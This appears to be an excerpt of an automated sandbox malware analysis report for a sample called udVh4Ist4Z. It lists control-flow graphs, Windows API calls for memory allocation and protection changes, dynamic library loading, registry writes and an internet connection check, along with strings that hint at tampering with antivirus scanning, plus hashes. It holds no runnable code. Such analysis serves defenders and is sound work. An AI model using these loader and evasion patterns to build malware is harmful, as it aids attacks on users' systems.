                                                                                        control_flow_graph 12450 2d61724-2d61736 12451 2d6173c-2d6174c 12450->12451 12452 2d61968-2d6196d 12450->12452 12455 2d617a4-2d617ad 12451->12455 12456 2d6174e-2d6175b 12451->12456 12453 2d61973-2d61984 12452->12453 12454 2d61a80-2d61a83 12452->12454 12457 2d61986-2d619a2 12453->12457 12458 2d61938-2d61945 12453->12458 12460 2d61684-2d616ad VirtualAlloc 12454->12460 12461 2d61a89-2d61a8b 12454->12461 12455->12456 12459 2d617af-2d617bb 12455->12459 12462 2d61774-2d61780 12456->12462 12463 2d6175d-2d6176a 12456->12463 12471 2d619a4-2d619ac 12457->12471 12472 2d619b0-2d619bf 12457->12472 12458->12457 12464 2d61947-2d6195b Sleep 12458->12464 12459->12456 12473 2d617bd-2d617c9 12459->12473 12465 2d616df-2d616e5 12460->12465 12466 2d616af-2d616dc call 2d61644 12460->12466 12469 2d61782-2d61790 12462->12469 12470 2d617f0-2d617f9 12462->12470 12467 2d61794-2d617a1 12463->12467 12468 2d6176c-2d61770 12463->12468 12464->12457 12474 2d6195d-2d61964 Sleep 12464->12474 12466->12465 12480 2d6182c-2d61836 12470->12480 12481 2d617fb-2d61808 12470->12481 12476 2d61a0c-2d61a22 12471->12476 12477 2d619c1-2d619d5 12472->12477 12478 2d619d8-2d619e0 12472->12478 12473->12456 12479 2d617cb-2d617de Sleep 12473->12479 12474->12458 12487 2d61a24-2d61a32 12476->12487 12488 2d61a3b-2d61a47 12476->12488 12477->12476 12484 2d619e2-2d619fa 12478->12484 12485 2d619fc-2d619fe call 2d615cc 12478->12485 12479->12456 12483 2d617e4-2d617eb Sleep 12479->12483 12489 2d618a8-2d618b4 12480->12489 12490 2d61838-2d61863 12480->12490 12481->12480 12486 2d6180a-2d6181e Sleep 12481->12486 12483->12455 12495 2d61a03-2d61a0b 12484->12495 12485->12495 12486->12480 12497 2d61820-2d61827 Sleep 12486->12497 12487->12488 12498 2d61a34 12487->12498 12491 2d61a68 12488->12491 12492 2d61a49-2d61a5c 12488->12492 12493 2d618b6-2d618c8 12489->12493 12494 2d618dc-2d618eb call 2d615cc 12489->12494 12499 2d61865-2d61873 12490->12499 12500 2d6187c-2d6188a 12490->12500 12503 2d61a6d-2d61a7f 12491->12503 12502 2d61a5e-2d61a63 call 2d61500 12492->12502 12492->12503 12506 2d618cc-2d618da 12493->12506 12507 2d618ca 12493->12507 12511 2d618fd-2d61936 12494->12511 12515 2d618ed-2d618f7 12494->12515 12497->12481 12498->12488 12499->12500 12501 2d61875 12499->12501 12504 2d6188c-2d618a6 call 2d61500 12500->12504 12505 2d618f8 12500->12505 12501->12500 12502->12503 12504->12511 12505->12511 12506->12511 12507->12506
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?,02D62000), ref: 02D617D0
                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,02D62000), ref: 02D617E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 8c0a7f7c3ca38aa0c7cfb83081eb06eda664888dcbe859fd6b5682a16126888f
                                                                                        • Instruction ID: 6b91ca503e8ff5193dd33cc755d56b4d410187129f7c3e2651ca209729d24153
                                                                                        • Opcode Fuzzy Hash: 8c0a7f7c3ca38aa0c7cfb83081eb06eda664888dcbe859fd6b5682a16126888f
                                                                                        • Instruction Fuzzy Hash: 47B1C176A012528BC716CF68D4C8365BBE1EB85354F2886BAD85D8B3C5D770DC51CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B61
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02D77B67
                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProcProtectVirtual
                                                                                        • String ID: irtualProtect$kernel32
                                                                                        • API String ID: 2099061454-2063912171
                                                                                        • Opcode ID: 04b3f6742616da70cb997af93206fc9e90f63a4c7add2bc569feb1ef0c48088b
                                                                                        • Instruction ID: 187da9640340345cfc16698c6d37c01e915063d22758e7759b4b533c0a5b9431
                                                                                        • Opcode Fuzzy Hash: 04b3f6742616da70cb997af93206fc9e90f63a4c7add2bc569feb1ef0c48088b
                                                                                        • Instruction Fuzzy Hash: 47017C74640248BFE710EFA4EC55E6AB7EDEB48710FA14861F904E3740E674EE008A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D61A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 12529 2d61a8c-2d61a9b 12530 2d61aa1-2d61aa5 12529->12530 12531 2d61b6c-2d61b6f 12529->12531 12534 2d61aa7-2d61aae 12530->12534 12535 2d61b08-2d61b11 12530->12535 12532 2d61b75-2d61b7f 12531->12532 12533 2d61c5c-2d61c60 12531->12533 12541 2d61b81-2d61b8d 12532->12541 12542 2d61b3c-2d61b49 12532->12542 12538 2d61c66-2d61c6b 12533->12538 12539 2d616e8-2d6170b call 2d61644 VirtualFree 12533->12539 12536 2d61ab0-2d61abb 12534->12536 12537 2d61adc-2d61ade 12534->12537 12535->12534 12540 2d61b13-2d61b27 Sleep 12535->12540 12545 2d61ac4-2d61ad9 12536->12545 12546 2d61abd-2d61ac2 12536->12546 12548 2d61af3 12537->12548 12549 2d61ae0-2d61af1 12537->12549 12559 2d61716 12539->12559 12560 2d6170d-2d61714 12539->12560 12540->12534 12550 2d61b2d-2d61b38 Sleep 12540->12550 12543 2d61bc4-2d61bd2 12541->12543 12544 2d61b8f-2d61b92 12541->12544 12542->12541 12551 2d61b4b-2d61b5f Sleep 12542->12551 12552 2d61b96-2d61b9a 12543->12552 12555 2d61bd4-2d61bd9 call 2d614c0 12543->12555 12544->12552 12554 2d61af6-2d61b03 12548->12554 12549->12548 12549->12554 12550->12535 12551->12541 12556 2d61b61-2d61b68 Sleep 12551->12556 12557 2d61bdc-2d61be9 12552->12557 12558 2d61b9c-2d61ba2 12552->12558 12554->12532 12555->12552 12556->12542 12557->12558 12566 2d61beb-2d61bf2 call 2d614c0 12557->12566 12562 2d61bf4-2d61bfe 12558->12562 12563 2d61ba4-2d61bc2 call 2d61500 12558->12563 12564 2d61719-2d61723 12559->12564 12560->12564 12569 2d61c00-2d61c28 VirtualFree 12562->12569 12570 2d61c2c-2d61c59 call 2d61560 12562->12570 12566->12558
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?), ref: 02D61B17
                                                                                        • Sleep.KERNEL32(0000000A,00000000,?), ref: 02D61B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 0f1619fd48173781fe9ea775b504fb2219e030c07daa49aa2224ae51dd2a5383
                                                                                        • Instruction ID: 77760b087c553d19214a3eaaf14d33ba5fc2444ea177d6b481a01417e2c20954
                                                                                        • Opcode Fuzzy Hash: 0f1619fd48173781fe9ea775b504fb2219e030c07daa49aa2224ae51dd2a5383
                                                                                        • Instruction Fuzzy Hash: B2518B71A052428FE715CF6CC989766BBE0EB46314F2885AED84CCB386E760DC45CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7C8AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D7C9EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        • Opcode ID: 28da0740028b82f600e91f98e8e3ca18b83bfcaeade9b4dc9d7c48ef695d7cc6
                                                                                        • Instruction ID: 62391fdca6de0c1469aa3946fdea02e7dadf15822fec31985d38a66103fbffe6
                                                                                        • Opcode Fuzzy Hash: 28da0740028b82f600e91f98e8e3ca18b83bfcaeade9b4dc9d7c48ef695d7cc6
                                                                                        • Instruction Fuzzy Hash: 52410031B642499FEB20EBA4D855EEEB3F6EF88715F604436E041B7350EA74AD058F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D75BE8 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D75C44
                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D75C72
                                                                                          • Part of subcall function 02D67D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D738BC,02D75CB2,00000000,02D75D30,?,?,02D738BC), ref: 02D67D66
                                                                                          • Part of subcall function 02D67F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D738BC,02D75CCD,00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D67F73
                                                                                        • GetLastError.KERNEL32(00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D75CD7
                                                                                          • Part of subcall function 02D6A734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D6C395,00000000,02D6C3EF), ref: 02D6A753
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 503785936-0
                                                                                        • Opcode ID: 534aaf02d7a7f829e339f4c42c8ff28e697c840a5b24c5b6a3c81630ef6dcd45
                                                                                        • Instruction ID: 94cd8299d61e8f0b2ff815289e39b8d9dfd1b99f70b515ffac4d1057c6ac9abc
                                                                                        • Opcode Fuzzy Hash: 534aaf02d7a7f829e339f4c42c8ff28e697c840a5b24c5b6a3c81630ef6dcd45
                                                                                        • Instruction Fuzzy Hash: BC317330A046489FEB00DFA4D885BADBBB6EF48714F908565D904A7380E7799D05CFB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7D316 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02DC5798), ref: 02D7D35C
                                                                                        • RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D394
                                                                                        • RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D39F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 779948276-0
                                                                                        • Opcode ID: c248a9a90fde8834302ce0fd7d5a5239432cb3d0b034ab2b0493d5d2ffc3477d
                                                                                        • Instruction ID: 576c34ea6207e3daf718e52a752d136d067985c7c7080e0bcea220359c87aefc
                                                                                        • Opcode Fuzzy Hash: c248a9a90fde8834302ce0fd7d5a5239432cb3d0b034ab2b0493d5d2ffc3477d
                                                                                        • Instruction Fuzzy Hash: E211FB70640205AFEB10EB68D895A6E77EDEB09310F90446AF508E7790EB34ED558F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7D318 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02DC5798), ref: 02D7D35C
                                                                                        • RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D394
                                                                                        • RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D39F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 779948276-0
                                                                                        • Opcode ID: 4ad8e3527b11b7647d20bc26781c9e20f3d790bbd5418f03217be9f59ba4a57b
                                                                                        • Instruction ID: e67ec65cc44ed1d8fa7d00347d25e761df44c76fb329f61434e0b252bffa6f26
                                                                                        • Opcode Fuzzy Hash: 4ad8e3527b11b7647d20bc26781c9e20f3d790bbd5418f03217be9f59ba4a57b
                                                                                        • Instruction Fuzzy Hash: 73110D70640205AFEB10EF68D895A6E77EDEB09310F90446AF508E7790DB34ED558F70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                        • GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D77B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B61
                                                                                          • Part of subcall function 02D77B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02D77B67
                                                                                          • Part of subcall function 02D77B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2543409266-0
                                                                                        • Opcode ID: 07fdc532f3642d860c7661d158b66e792f8a637bd0f199954039d0cbbb09b223
                                                                                        • Instruction ID: 349921c01880cdf501f7f9cc305e0b9da9ae2bb78c84858530fe5cad5dd690c7
                                                                                        • Opcode Fuzzy Hash: 07fdc532f3642d860c7661d158b66e792f8a637bd0f199954039d0cbbb09b223
                                                                                        • Instruction Fuzzy Hash: 15019670640245AFF704EBA4EC55A2EB7A9EB48300FE00465A55AF7740EA78FD008FB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6E320 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 640e0d541b22457bc2685fc9f274b17a38e7e76509dd6bb5aebb368a5b5931d7
                                                                                        • Instruction ID: e9e0a539a38b5cdffc3a54a6acaee885f277c49c6d45ccb3afb6e1159a9f28bc
                                                                                        • Opcode Fuzzy Hash: 640e0d541b22457bc2685fc9f274b17a38e7e76509dd6bb5aebb368a5b5931d7
                                                                                        • Instruction Fuzzy Hash: 02F0AF287041108BC7106B38C98CEBE2B9AEF51312F585422A4C65B395DB24CC05CA72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D64D14 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02D64D1F
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D64D31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 986138563-0
                                                                                        • Opcode ID: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                        • Instruction ID: 4244515e7a06aa9be465a565b7349f64582eca0bfd3ddb1755a5d4dea0b3b01e
                                                                                        • Opcode Fuzzy Hash: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                        • Instruction Fuzzy Hash: 0BE012B81052015FEB252F208D4DF3B336AEFD5745F598499A804CA350DB34CC41EE74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77098 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(?), ref: 02D77396
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID: H
                                                                                        • API String ID: 3341692771-2852464175
                                                                                        • Opcode ID: 44c3f3d62747514d565a36d171d49a870abb22e11b986a741dfbe3de2c83a809
                                                                                        • Instruction ID: 0b02dd9daf76f5b25bc34d90e8d239829b81f7473cfe039b01b07d016cbc5d22
                                                                                        • Opcode Fuzzy Hash: 44c3f3d62747514d565a36d171d49a870abb22e11b986a741dfbe3de2c83a809
                                                                                        • Instruction Fuzzy Hash: 5CB1D274A016099FEB10CF98D880AADFBF2FF49314F248969E855AB364E734AC45CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6E71C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02D6E73D
                                                                                          • Part of subcall function 02D6E320: VariantClear.OLEAUT32(?), ref: 02D6E32F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCopy
                                                                                        • String ID:
                                                                                        • API String ID: 274517740-0
                                                                                        • Opcode ID: 0abe89dd3e121fa99964b8ac705524023e772d8533534b3d5ac632af7c600462
                                                                                        • Instruction ID: a4eea43e5e7eec6385e2de35f0c4369083395d126dafb5d166e8d9e723ef8b2b
                                                                                        • Opcode Fuzzy Hash: 0abe89dd3e121fa99964b8ac705524023e772d8533534b3d5ac632af7c600462
                                                                                        • Instruction Fuzzy Hash: C011A1387006509BD720AF28C9CCE7767EAEF85B50B149466E68A8B355DB31DC41CAB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6E3B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1927566239-0
                                                                                        • Opcode ID: 77a9d7ce770d052951130d65bf9a5d8ff7a6551586c980461d8c49f416c2e6ee
                                                                                        • Instruction ID: 7a59035e67a982cb038bf47d49a9244355afb61e414073752679dfe31e088262
                                                                                        • Opcode Fuzzy Hash: 77a9d7ce770d052951130d65bf9a5d8ff7a6551586c980461d8c49f416c2e6ee
                                                                                        • Instruction Fuzzy Hash: 9E314D79A04209AFEB10DEA8D88CEBAB7E8EB0C314F444561E905D7B40D334ED50CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D76D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02D76D75,?,?,?,00000000), ref: 02D76D55
                                                                                          • Part of subcall function 02D64C24: SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgString
                                                                                        • String ID:
                                                                                        • API String ID: 4225568880-0
                                                                                        • Opcode ID: 248c82937b9cb2a3a8d15c6a8403b566241f5084185eac490e0c78c768fffc84
                                                                                        • Instruction ID: 787ca99b99435a081e5b43cdd6caba303a4bbed581dab5881d900e1431f36e3a
                                                                                        • Opcode Fuzzy Hash: 248c82937b9cb2a3a8d15c6a8403b566241f5084185eac490e0c78c768fffc84
                                                                                        • Instruction Fuzzy Hash: 30E06571614A047FE715EA72DC5596A77EDDB49710F620471A80093700F9759E048DB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6584A
                                                                                          • Part of subcall function 02D65A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D60000,02D8B790), ref: 02D65AAC
                                                                                          • Part of subcall function 02D65A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65ACA
                                                                                          • Part of subcall function 02D65A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65AE8
                                                                                          • Part of subcall function 02D65A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D65B06
                                                                                          • Part of subcall function 02D65A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D65B4F
                                                                                          • Part of subcall function 02D65A90: RegQueryValueExA.ADVAPI32(?,02D65CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001), ref: 02D65B6D
